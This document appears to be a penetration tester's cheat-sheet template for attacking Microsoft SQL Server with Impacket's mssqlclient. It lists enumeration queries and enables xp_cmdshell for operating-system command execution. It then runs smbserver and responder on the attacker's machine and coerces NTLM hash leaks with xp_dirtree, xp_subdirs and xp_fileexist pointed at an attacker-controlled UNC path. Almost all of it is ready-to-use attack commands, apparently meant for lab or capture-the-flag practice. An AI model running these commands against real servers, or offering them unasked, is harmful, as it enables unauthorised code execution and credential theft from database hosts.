Using some Impacket tools
(If using kali try impacket-mssqlclient
)
mssqlclient.py <user>@<% tp.frontmatter.target_ip %> -windows-auth
After being connected
select name from sys.databases
EXEC sp_databases
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT name FROM master.sys.databases
Switch DBs
use <db>
SELECT name FROM sysobjects WHERE xtype = 'U'
Show all tables of DB
SELECT * FROM <db_NAME>.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
You don't always have permissions, but good to try
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Example of code execution (If the above commands work)
xp_cmdshell "whoami"
On your machine (If using kali try impacket-smbserver
)
sudo smbserver.py share ./ -smb2support
sudo responder -I tun0
A couple different ways to send a hash (These are done within MSSQL)
xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
exec master.dbo.xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_subdirs '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_fileexist '\\<% tp.frontmatter.my_ip %>\pwn'